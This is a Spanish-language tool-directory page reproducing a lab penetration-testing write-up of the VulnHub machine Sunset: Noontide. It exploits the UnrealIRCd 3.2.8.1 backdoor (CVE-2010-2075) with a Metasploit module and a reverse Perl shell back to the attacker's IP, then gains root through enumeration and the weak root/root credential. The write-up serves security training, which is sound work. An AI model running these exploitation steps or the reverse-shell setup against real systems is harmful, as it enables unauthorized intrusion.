Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
sunset-noontide-pentesting — Descripción Evaluación profesional de pruebas de penetración de la máquina Sunset: Noontide de VulnHub, que abarca reconocimiento, enumeración de servicios, explotación de CVE-2010-2075, post-explotación, escalada de privilegios y compromiso total del sistema. | Kitploit
Herramientas/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalada de PrivilegiosReconocimientoEscaneo de PuertosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónSeguridad de RedesCTFPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Red Teaming
Labs y Práctica
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Descripción Evaluación profesional de pruebas de penetración de la máquina Sunset: Noontide de VulnHub, que abarca reconocimiento, enumeración de servicios, explotación de CVE-2010-2075, post-explotación, escalada de privilegios y compromiso total del sistema.

Ver Repositorio
hace 9h 7mAún no revisado

Sunset: Noontide — Pruebas de Penetración

Una evaluación profesional de pruebas de penetración y guía de CTF de Sunset: Noontide, una máquina intencionalmente vulnerable de VulnHub.

Este proyecto documenta el ciclo de vida completo de las pruebas de penetración, incluyendo reconocimiento, enumeración de servicios, investigación de vulnerabilidades, explotación, acceso inicial, post-explotación, escalada de privilegios, prueba de compromiso, evaluación de riesgos, mapeo de MITRE ATT&CK y remediación.

⚠️ Descargo de responsabilidad: Esta evaluación se realizó contra una máquina intencionalmente vulnerable en un entorno de laboratorio autorizado. Las técnicas y comandos documentados aquí están destinados únicamente a sistemas para los cuales se ha obtenido autorización explícita.


🎯 Objetivos

  • Identificar el host objetivo
  • Enumerar los servicios expuestos
  • Identificar software y versiones vulnerables
  • Investigar vulnerabilidades aplicables
  • Explotar el servicio vulnerable
  • Obtener acceso inicial a la shell
  • Realizar enumeración de post-explotación en Linux
  • Identificar oportunidades de escalada de privilegios
  • Obtener acceso a nivel root
  • Recuperar los archivos de prueba de usuario y root
  • Documentar los hallazgos de seguridad
  • Proporcionar recomendaciones de remediación

🖥️ Entorno de Laboratorio

ComponenteDetalles
ObjetivoSunset: Noontide
PlataformaVulnHub
IP Objetivo10.106.186.186
Nombre de Host Objetivonoontide
SO ObjetivoDebian GNU/Linux 10 (Buster)
Arquitecturax86_64
Plataforma AtacanteKali Linux
IP Atacante10.106.186.204
Tipo de EvaluaciónEvaluación de Laboratorio Autorizada
Riesgo GeneralCRÍTICO
Resultado de la EvaluaciónCompromiso Total del Sistema

🔐 Cadena de Ataque

Descubrimiento del Objetivo → Enumeración con Nmap → UnrealIRCd 3.2.8.1 Identificado → SearchSploit → CVE-2010-2075 Identificado → Explotación con Metasploit → Shell de Comandos Remota → Shell como server → Post-Explotación en Linux → Credencial Root Débil → su root → UID 0 / Acceso Root → Archivos de Prueba de Usuario y Root


1. Reconocimiento

Se realizó un descubrimiento de red inicial para identificar el objetivo vulnerable.

El objetivo fue finalmente identificado como:

10.106.186.186

Durante el reconocimiento, 10.106.186.142 fue identificado como la puerta de enlace predeterminada en lugar del objetivo previsto.

Esto resalta la importancia de identificar correctamente el objetivo antes de realizar pruebas de seguridad adicionales, particularmente en una red de laboratorio puenteada o compartida.


2. Enumeración de Servicios

Se realizó la detección de servicios y versiones con Nmap contra el objetivo usando:

nmap -sV 10.106.186.186

El servicio expuesto significativo identificado durante la evaluación fue:

6667/tcp open irc UnrealIRCd

Luego se realizó un escaneo más detallado usando:

nmap -sC -sV -Pn -p 6667 10.106.186.186

El servicio fue identificado como:

UnrealIRCd 3.2.8.1

El servicio IRC también reportó:

irc.foonet.com

El servicio UnrealIRCd expuesto se convirtió en la superficie de ataque principal investigada durante la evaluación.


3. Investigación de Vulnerabilidades

Se utilizó SearchSploit para investigar vulnerabilidades documentadas públicamente asociadas con la versión de UnrealIRCd descubierta.

Comando:

searchsploit UnrealIRCd 3.2.8.1

El resultado relevante fue:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

La vulnerabilidad fue identificada como:

CVE-2010-2075

Vulnerabilidad

Ejecución de Comandos por Backdoor en UnrealIRCd 3.2.8.1

Severidad

Crítica

Tipo de Ataque

Ejecución Remota de Comandos

Impacto de Seguridad

La explotación exitosa del servicio vulnerable permite a un atacante ejecutar comandos remotamente en el sistema objetivo.


4. Explotación con Metasploit

El servicio IRC vulnerable fue explotado usando el Framework Metasploit.

El módulo seleccionado fue:

exploit/unix/irc/unreal_ircd_3281_backdoor

Configuración de ejemplo:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

Los intentos iniciales de payload no produjeron una sesión utilizable.

Posteriormente se seleccionó un payload compatible de Perl inverso para Unix:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit reportó que el objetivo parecía vulnerable y abrió exitosamente una sesión de shell de comandos.


5. Acceso Inicial

La shell obtenida fue verificada usando:

whoami

Resultado:

server

Esto confirmó la ejecución remota de comandos exitosa como la cuenta server.

El directorio de trabajo inicial fue:

/home/server/irc/Unreal3.2

En esta etapa, la evaluación progresó desde la explotación remota del servicio hasta la enumeración local de post-explotación.


6. Enumeración de Post-Explotación

Después de obtener la shell, se realizó la enumeración estándar de Linux para comprender el host comprometido e identificar posibles rutas de escalada de privilegios.

Usuario Actual

Comando:

id

Resultado:

uid=1000(server) gid=1000(server)

La cuenta era un usuario no root.

Nombre de Host

Comando:

hostname

Resultado:

noontide

Información del Kernel

Comando:

uname -a

Resultado:

Linux noontide 4.19.0-10-amd64 x86_64

Sistema Operativo

Comando:

cat /etc/os-release

Resultado:

Debian GNU/Linux 10 (buster)

Estos comandos establecieron la identidad actual, el nombre de host, la versión del kernel, el sistema operativo y la configuración general del sistema.


7. Enumeración de Escalada de Privilegios

Se realizaron varias verificaciones estándar de escalada de privilegios en Linux.

7.1 Enumeración de SUID

Comando:

find / -perm -4000 -type f 2>/dev/null

Se identificaron binarios SUID estándar como passwd, chsh, mount, umount, su, chfn, newgrp y gpasswd.

No se identificó ningún binario SUID personalizado o anómalo obvio como el vector de escalada exitoso.


7.2 Enumeración de Sudo

Comando:

sudo -l

No se identificó ninguna ruta útil de escalada de privilegios basada en sudo a partir de la salida disponible.


7.3 Enumeración de Cron

Comandos:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

Los trabajos programados observados eran trabajos de sistema estándar al estilo Debian.

No se identificó ningún trabajo cron de root escribible obvio.


7.4 Enumeración de Archivos Escribibles

Comando:

find / -writable -type f 2>/dev/null | head -100

Los resultados iniciales fueron principalmente pseudo-archivos de /proc y no revelaron un vector práctico de escalada de privilegios.


7.5 Capacidades de Linux

Comando:

getcap -r / 2>/dev/null

No se identificó ninguna escalada de privilegios útil basada en capacidades a partir de la salida resultante.


8. Escalada de Privilegios

La ruta exitosa de escalada de privilegios se basó en las credenciales root intencionalmente débiles configuradas en la máquina vulnerable.

Se accedió a la cuenta root usando:

su root

Contraseña:

root

El acceso root fue luego verificado usando:

id

Resultado:

uid=0(root) gid=0(root) groups=0(root)

La identidad también fue confirmada usando:

whoami

Resultado:

root

Esto confirmó el control administrativo completo del sistema objetivo.


9. Prueba de Compromiso

9.1 Prueba a Nivel de Usuario

El archivo de prueba a nivel de usuario se encontraba en:

/home/server/local.txt

Comando:

cat /home/server/local.txt

Resultado:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Prueba a Nivel de Root

El archivo de prueba a nivel de root se encontraba en:

/root/proof.txt

Comando:

cat /root/proof.txt

Resultado:

ab28c8ca8da1b9ffc2d702ac54221105

La prueba de root también devolvió:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

La recuperación de ambos archivos de prueba confirma el compromiso exitoso desde el acceso remoto inicial hasta el control a nivel de root.


10. Resumen de Riesgos

IDHallazgoSeveridadImpacto
VULN-01Backdoor en UnrealIRCd 3.2.8.1🔴 CríticaEjecución Remota de Comandos
VULN-02Credenciales Root Débiles🔴 CríticaCompromiso Administrativo Total

11. Hallazgos Detallados

VULN-01 — Backdoor en UnrealIRCd 3.2.8.1

Severidad: Crítica

Servicio Afectado: IRC / TCP 6667

Software Afectado: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

Tipo de Ataque: Ejecución Remota de Comandos

Impacto Observado: Shell remota obtenida como server

Descripción

El servicio UnrealIRCd expuesto estaba ejecutando una versión vulnerable asociada con una vulnerabilidad conocida de ejecución de comandos por backdoor.

La vulnerabilidad fue identificada mediante la enumeración de servicios y la investigación con SearchSploit y fue explotada exitosamente usando Metasploit.

Impacto Empresarial

Un atacante capaz de alcanzar el servicio IRC vulnerable podría ejecutar comandos remotamente y obtener acceso no autorizado al host.


VULN-02 — Credenciales Root Débiles

Severidad: Crítica

Cuenta Afectada: root

Credencial Observada: root / root

Impacto Observado: Acceso administrativo UID 0

Descripción

La cuenta root estaba configurada con una credencial extremadamente débil.

Después de obtener una shell local como server, se accedió a la cuenta root usando la credencial débil y se verificó con UID 0.

Impacto Empresarial

Un atacante que obtiene acceso a la shell local puede usar la credencial root débil para obtener el control completo del sistema operativo.


12. Mapeo de MITRE ATT&CK


13. Recomendaciones de Remediación

13.1 Eliminar o Actualizar UnrealIRCd

Reemplace la instalación vulnerable de UnrealIRCd con una versión confiable y soportada.

Verifique la integridad del software y la procedencia del paquete antes del despliegue.

13.2 Eliminar Software con Backdoor

Si la integridad o procedencia del software es incierta, reconstruya el sistema usando medios de instalación confiables y paquetes verificados.

13.3 Eliminar Credenciales Débiles

Reemplace las credenciales predeterminadas y débiles con credenciales administrativas fuertes y únicas.

No use contraseñas simples como root.

13.4 Restringir la Exposición de IRC

Si IRC es necesario, restrinja el acceso usando:

  • Reglas de firewall
  • Segmentación de red
  • Acceso VPN
  • Restricciones de IP de origen

13.5 Aplicar Actualizaciones de Seguridad

Mantenga un proceso documentado de gestión de parches para el sistema operativo y todos los servicios expuestos.

13.6 Monitorear el Acceso Privilegiado

Registre y revise:

  • Autenticación administrativa
  • Acceso root
  • Cambios de privilegios
  • Actividad de autenticación sospechosa

14. Metodología de Pruebas de Penetración


15. Herramientas Utilizadas

  • Nmap — Descubrimiento de red y enumeración de servicios
  • SearchSploit — Investigación de vulnerabilidades y exploits
  • Metasploit Framework — Explotación y establecimiento de sesión
  • Utilidades de Línea de Comandos de Linux — Post-explotación y enumeración de privilegios

16. Habilidades Demostradas

  • Reconocimiento de Red
  • Descubrimiento de Hosts
  • Escaneo de Puertos
  • Enumeración de Servicios
  • Identificación de Versiones
  • Evaluación de Vulnerabilidades
  • Investigación de CVE
  • SearchSploit
  • Metasploit Framework
  • Ejecución Remota de Comandos
  • Enumeración de Linux
  • Enumeración de SUID
  • Enumeración de Sudo
  • Enumeración de Cron
  • Enumeración de Archivos Escribibles
  • Capacidades de Linux
  • Evaluación de Seguridad de Credenciales
  • Escalada de Privilegios
  • Prueba de Compromiso
  • Mapeo de MITRE ATT&CK
  • Evaluación de Riesgos
  • Reporte de Seguridad
  • Análisis de Remediación

17. Evaluación Final

El host Sunset: Noontide fue comprometido exitosamente desde el acceso de red inicial hasta el control completo a nivel de root.

La vulnerabilidad principal de acceso inicial fue el backdoor de UnrealIRCd 3.2.8.1 (CVE-2010-2075).

La vulnerabilidad proporcionó ejecución remota de comandos y resultó en una shell inicial como la cuenta server.

Luego se realizó la enumeración de post-explotación, incluyendo verificaciones de SUID, sudo, cron, archivos escribibles, capacidades de Linux, identidad, sistema operativo y sistema de archivos.

Estas verificaciones no identificaron la ruta de escalada exitosa.

El acceso administrativo completo se logró finalmente a través de las credenciales root débiles de la máquina.

La recuperación exitosa de ambos archivos de prueba, a nivel de usuario y de root, confirmó el compromiso total del sistema.

Evaluación General

CRÍTICO — Compromiso Total del Sistema Logrado


18. Resultados de la Evaluación


19. Informe Profesional de Pruebas de Penetración

Se incluye un informe detallado y profesional de pruebas de penetración con este proyecto:

Sunset-Noontide-Penetration-Testing-Report.pdf

El informe contiene:

  • Resumen Ejecutivo
  • Control de Documentos
  • Alcance y Reglas de Compromiso
  • Resumen de Riesgos
  • Ruta de Ataque
  • Reconocimiento
  • Enumeración de Servicios
  • Investigación de Vulnerabilidades
  • Explotación con Metasploit
  • Acceso Inicial
  • Post-Explotación
  • Escalada de Privilegios
  • Evidencia y Archivos de Prueba
  • Hallazgos Detallados
  • Mapeo de MITRE ATT&CK
  • Recomendaciones de Remediación
  • Evaluación Final

20. Evidencia

Estructura sugerida del repositorio:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

Las capturas de pantalla deben contener únicamente información del entorno de laboratorio autorizado.


21. Lecciones Aprendidas

Esta evaluación proporcionó experiencia práctica en:

  1. Identificar correctamente el objetivo previsto en un entorno de red.
  2. Realizar enumeración de servicios y versiones con Nmap.
  3. Investigar vulnerabilidades usando SearchSploit.
  4. Seleccionar un módulo de exploit de Metasploit apropiado.
  5. Solucionar problemas de compatibilidad de payloads.
  6. Establecer una shell de comandos remota.
  7. Realizar enumeración de post-explotación en Linux.
  8. Verificar sistemáticamente vectores comunes de escalada de privilegios.
  9. Identificar credenciales administrativas débiles.
  10. Verificar el compromiso a nivel de root.
  11. Recopilar evidencia de prueba de compromiso.
  12. Documentar vulnerabilidades en un formato profesional de pruebas de penetración.

22. ⚠️ Descargo de Responsabilidad Legal y Ético

Este repositorio está destinado estrictamente a:

  • Educación en ciberseguridad
  • Pruebas de penetración autorizadas
  • Práctica de CTF
  • Investigación de vulnerabilidades
  • Entornos de laboratorio

Las técnicas documentadas en este repositorio deben realizarse únicamente contra sistemas para los cuales se ha obtenido autorización explícita.

No use estas técnicas contra sistemas de producción, infraestructura pública o sistemas de terceros sin permiso.


👨‍💻 Autor

Alen Sales K S

Ciberseguridad | Pruebas de Penetración | SOC | Seguridad de Redes

GitHub: https://github.com/zales2004


⭐ Resumen del Proyecto

Sunset: Noontide demuestra un flujo de trabajo completo de pruebas de penetración:

Reconocimiento → Enumeración → Investigación de Vulnerabilidades → Explotación → Acceso Inicial → Post-Explotación → Escalada de Privilegios → Acceso Root → Recolección de Evidencia → Evaluación de Riesgos → Reporte de Seguridad

Resultado de la Evaluación: CRÍTICO — Compromiso Total del Sistema Logrado

Descargar herramienta
TécnicaIDActividad Observada
Network Service ScanningT1046Enumeración con Nmap
Exploit Public-Facing ApplicationT1190Explotación del servicio UnrealIRCd expuesto
Command and Scripting InterpreterT1059Shell de comandos remota
Valid AccountsT1078Uso de credenciales root
Account DiscoveryT1087Enumeración de identidad y usuarios
System Information DiscoveryT1082uname y /etc/os-release
File and Directory DiscoveryT1083Enumeración del sistema de archivos
Scheduled Task/Job DiscoveryT1053Enumeración de cron
Permission Groups DiscoveryT1069id y enumeración de grupos
FaseActividades
ReconocimientoDescubrimiento de red e identificación del objetivo
EnumeraciónDetección de servicios/versiones con Nmap
Investigación de VulnerabilidadesIdentificación de módulos con SearchSploit y Metasploit
ExplotaciónExplotación del backdoor de UnrealIRCd
Acceso InicialShell de comandos como server
Post-ExplotaciónEnumeración de identidad, SO, sistema de archivos y privilegios
Escalada de PrivilegiosVerificaciones de SUID, sudo, cron, archivos escribibles y capacidades
Recolección de EvidenciaArchivos de prueba de usuario y root
ReporteHallazgos, análisis de riesgos y remediación
ObjetivoEstado
Objetivo Identificado✅ PASS
Servicio Expuesto Identificado✅ PASS
Versión Vulnerable Identificada✅ PASS
CVE Identificado✅ PASS
Ejecución Remota de Comandos✅ PASS
Shell Inicial como server✅ PASS
Prueba de Usuario Recuperada✅ PASS
Escalada de Privilegios✅ PASS
Acceso Root Verificado✅ PASS
Prueba de Root Recuperada✅ PASS